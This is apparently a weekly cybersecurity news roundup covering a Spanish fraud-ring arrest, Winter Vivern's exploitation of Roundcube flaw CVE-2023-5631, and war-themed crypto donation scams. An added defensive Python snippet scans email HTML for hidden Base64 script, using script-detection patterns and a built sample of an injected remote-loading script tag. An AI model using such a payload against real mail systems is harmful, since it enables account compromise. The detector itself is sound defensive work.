The Good, the Bad and the Ugly in Cybersecurity – Week 43

The Good | Multi-Million Dollar Scam Syndicate Dismantled Revealing Stolen Data of 4 Million Citizens

Four million people won justice this week when the Spanish National Police successfully dismantled a cybercriminal organization responsible for monetizing their stolen data. The police agency carried out a total of 16 targeted searches across multiple Spanish cities, resulting in the arrest of 34 members of the criminal group.

Source: Europol

During these raids, authorities seized a cache of illicit items, including firearms, high-end cars, and 80,000 euros in cash. The most critical discovery, however, was the recovery of computers holding sensitive banking information belonging to four million individuals, all ill-gotten by infiltrating financial and credit institutions.

Based on their report, the Spanish police said that the group members were linked to a wide array of fraudulent schemes. Through email and SMS phishing scams, members impersonated delivery companies and electricity suppliers to gain their victims’ trust. The members were also known to call unsuspecting parents, pretending to be ‘sons in distress’ as a means to extract ‘urgently needed’ money. In other cases, they allegedly leveraged an insider within an international tech firm and routed valuable merchandise to addresses under their control. The crime syndicate is estimated to have earned approximately $3.2 million from reselling stolen data to other cybercriminals.

Though the ringleaders of this particular cybercrime ring have been caught, social engineering tactics remain among the top attack paths into critical systems. Awareness training programs, in combination with multi-factor authentication (MFA), identity threat detection and response (ITDR) solutions, and robust endpoint security, can help both organizations and individual users combat this type of threat.

The Bad | Pro-Russian APT Exploits Webmail Zero-Day to Harvest Email Data From European Governments

The Winter Vivern APT has been found exploiting a zero-day vulnerability in Roundcube’s open-source webmail software. Targeting governments and think tanks in Europe, these attacks leveraged CVE-2023-5631 to harvest emails from compromised accounts. According to a security report this week, this is a marked step up in the threat actor’s cyber operations.

Russia- and Belarus-aligned Winter Vivern is a relatively underreported group with limited resources. In the latest string of attacks, however, researchers highlighted a notable shift in the APT’s tactics. Where Winter Vivern would typically exploit known flaws for which proof-of-concepts (PoCs) were readily available online, their latest attacks exploited a zero-day vulnerability. Zero-days are flaws that remain undisclosed to the software’s developers, providing threat actors with an advantage. In this case, Winter Vivern’s exploitation of the Roundcube zero-day allowed them to infiltrate email accounts and exfiltrate valuable data without prior detection or mitigation.

CVE-2023-5631 is a stored cross-site scripting flaw that could allow remote threat actors to load arbitrary JavaScript code. The attacks began with phishing messages containing a Base64-encoded payload embedded within the HTML source code. This payload, when decoded, facilitated a JavaScript injection from a remote server. A second-stage JavaScript component then acted as a loader, enabling the execution of a final payload that exfiltrated email messages to a command-and-control (C2) server. A fix for the vulnerability has since been released by Roundcube.
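A defender-side illustration of the delivery step described above: an added example (not from the original post or the underlying research) that scans an HTML email body for Base64 blobs, decodes those that are text, and flags any that contain script or remote-loading markers. The sample message, the hostname example.invalid and the function names are constructed for this example.

```python
import base64
import re

# Base64 token: 20+ alphabet chars plus optional padding, not glued to other
# base64-looking characters, so attribute values and data: URIs are caught whole.
B64_RE = re.compile(r'(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])')
# Markers that indicate the decoded text is (or loads) JavaScript.
JS_MARKERS = re.compile(r'<script\b|javascript:|\bon[a-z]+\s*=|eval\(|fetch\(|XMLHttpRequest', re.I)
REMOTE_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)

# Constructed sample: a benign binary blob (fake PNG) plus a hidden script tag
# that would pull a loader from a remote host (hostname is made up).
INJECTED = '<script src="https://example.invalid/load.js"></script>'
FAKE_PNG = base64.b64encode(b'\x89PNG\r\n\x1a\n' + bytes(range(256))).decode()
SAMPLE_HTML = (
    '<html><body><p>Invoice attached.</p>'
    '<img src="data:image/png;base64,' + FAKE_PNG + '">'
    '<div data-p="' + base64.b64encode(INJECTED.encode()).decode() + '"></div>'
    '</body></html>'
)


def decode_text_blobs(html):
    """Return the decoded form of every Base64 token that decodes to UTF-8 text."""
    texts = []
    for match in B64_RE.finditer(html):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            texts.append(raw.decode('utf-8'))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or binary content such as an image
    return texts


def find_hidden_script(html):
    """Flag decoded blobs that carry script markers; report any remote URLs they reference."""
    hits = []
    for text in decode_text_blobs(html):
        if JS_MARKERS.search(text):
            hits.append({'decoded': text, 'remote_urls': REMOTE_RE.findall(text)})
    return hits


if __name__ == '__main__':
    for hit in find_hidden_script(SAMPLE_HTML):
        print('hidden script:', hit['decoded'], '->', hit['remote_urls'])
```

The same scan can be run over the raw HTML part of inbound mail at the gateway, where a decoded blob with script markers is a strong signal for quarantine and review.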

Despite Winter Vivern’s limited resources, they have been able to lure high-value victims through persistent and frequent phishing campaigns and by leveraging previously unknown flaws in high-traffic software. Organizations can reduce their exposure by following regular patch schedules and ensuring deep monitoring within their systems.

The Ugly | Slews of Crypto Donation Scams Hit Social Media Platforms Amid Ongoing Israel-Hamas War

Cybercriminals are exploiting the deadly Israel-Hamas conflict to spread donation and fundraising scams through popular social media platforms. As reported this week, researchers have raised the alarm on how scammers are capitalizing on the ongoing war to solicit donations. So far, over 500 fraudulent emails have been observed impersonating charitable organizations and fundraisers. The cyber scammers have also been seen listing fraudulent cryptocurrency wallet addresses on Instagram, Telegram, and X, taking full advantage of high-strung emotions in the continuing political crisis.

Scam “aid Gaza” account on X (Source: BleepingComputer)

These scams seek to manipulate emotions, often posting graphic images of wounded soldiers, women, and children to spur action. Researchers saw similar social engineering tactics in circulation during the height of the Russo-Ukrainian war and following the Turkey-Syria earthquakes. To increase their chances of success, the scammers are creating multiple text variations to evade spam filters and modifying their designs to target specific groups. Spoofed websites often copy content directly from their legitimate counterparts, but crucially lack details about the organizational staff and contact information as well as fund usage.

Given the prevalence of these scams, the public is being advised to proceed with extreme caution when participating in online fundraisers. The U.S. Federal Trade Commission (FTC) has provided best practices to prevent falling victim to scams, and the IRS has also issued an advisory warning citizens against giving in to pressure. Always verify the authenticity of charitable organizations before making donations by referring to the government’s official charity register. Alongside social engineering schemes, security practitioners are warned to stay updated on other emerging cyber activity and threat actors currently active in the Middle East.